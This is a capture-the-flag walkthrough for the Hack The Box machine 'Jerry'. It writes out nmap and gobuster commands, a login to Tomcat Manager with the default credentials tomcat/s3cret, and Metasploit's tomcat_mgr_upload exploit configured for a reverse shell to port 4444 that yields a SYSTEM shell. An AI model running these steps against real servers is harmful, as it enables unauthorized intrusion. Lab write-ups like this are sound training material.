

First, copy the IP address of the target machine (you can find it in your Hack The Box account). For this walkthrough the IP of the target is but you will have a different one, so substitute yours in every command below.

As usual let's start with nmap:

nmap -sC -sV

nmap reports the host as down because it does not answer the ping probes, and suggests -Pn (skip host discovery and scan anyway), so let's retry with that flag:

nmap -sV -Pn

Port 8080 is open, so let's open our browser and type the target IP followed by :8080 in the url bar:

We get the Apache Tomcat default page.

As usual, let's first run gobuster to enumerate hidden directories on this website (the -x php extension is not really useful against a Tomcat server, but it does no harm). Type:

gobuster dir -u -w /opt/useful/SecLists/Discovery/Web-Content/common.txt -x php

We could look into each of these directories, but the one that stands out is /manager, the Tomcat Manager application, so let's open our browser and type the following in the url bar:

We are prompted for a login (HTTP Basic authentication). Let's try our luck and enter admin as the username and admin as the password. We get a 401 error page:

Interestingly, the error page returned by the manager application includes an example tomcat-users.xml snippet, and it contains a working set of credentials: tomcat as the username and s3cret as the password.

Let's try to login again but this time with tomcat and s3cret.

Open the browser and type in the url bar:

But this time we are not asked for our login details and go straight to the error page. That is because the browser cached the admin/admin credentials from the first attempt and is silently resending them in the Authorization header with every request.

Let's clear our cookies and site data, close the browser and try again!

This time we get the login page back, so let's enter tomcat as the username and s3cret as the password:

This time we are in!

Now let's google "Apache Tomcat Reverse Shell" and see what we can find. The first link seems interesting:

Let's follow the steps in the article. It uses two Metasploit modules: an auxiliary login scanner to find the credentials (which we already have) and an exploit that uses those credentials to deploy a malicious WAR through the manager application and get a shell on the target.

First we need to start Metasploit (msfconsole), so from your command prompt, type:


search tomcat

As recommended in the article, let's use the login scanner auxiliary/scanner/http/tomcat_mgr_login, so type:

use auxiliary/scanner/http/tomcat_mgr_login 


show options

For the module to work, we are required to provide the following:

RHOSTS - the remote host (the target IP)

RPORT - the remote port (8080 here, since the module defaults to 80)


set RPORT 8080

Now let's run the module. It tries a built-in list of default Tomcat usernames and passwords against /manager/html:


We get one "Login Successful" with username tomcat and password s3cret, confirming the credentials from the error page.

Still following the article above, let's look for the second module, the actual exploit:

search tomcat_mgr

use exploit/multi/http/tomcat_mgr_upload

show options

We need to provide RHOSTS (remote host) and RPORT (remote port) for the target, along with LHOST (local host) and LPORT (local port), which is where the reverse shell will connect back to, for the exploit to work.

set RPORT 8080

For LHOST we provide the IP of our own machine. You can find it by opening a new command prompt window and typing ifconfig; make sure to use the address of the Hack The Box VPN interface (tun0), since that is the only one the target can reach.

set LPORT 4444

Now that we have set up everything, let's run the exploit


Ok, it didn't work! That's because the exploit deploys its payload through the manager application, which needs a valid username and password (the HttpUsername and HttpPassword options shown under show options).

We found those earlier: the username is tomcat and the password is s3cret, so let's set them too:

set HttpPassword s3cret
set HttpUsername tomcat


Great! now we got the shell!

First type:



We are nt authority\system, the most privileged local account on Windows. The Tomcat service on this box runs as SYSTEM, so there is no privilege escalation step needed: we already have unrestricted access to the system.

cd C:/

Flags are usually in the C:\Users\Administrator\Desktop directory (and C:\Users\<user>\Desktop for the user flag), so let's type:

cd C:\Users\Administrator\Desktop


cd flags


type "2 for the price of 1.txt"

We got both the user flag and the root flag!

Don't forget to copy paste these flags and submit these flags in your Hack The Box account to be able to fully own the Jerry machine.
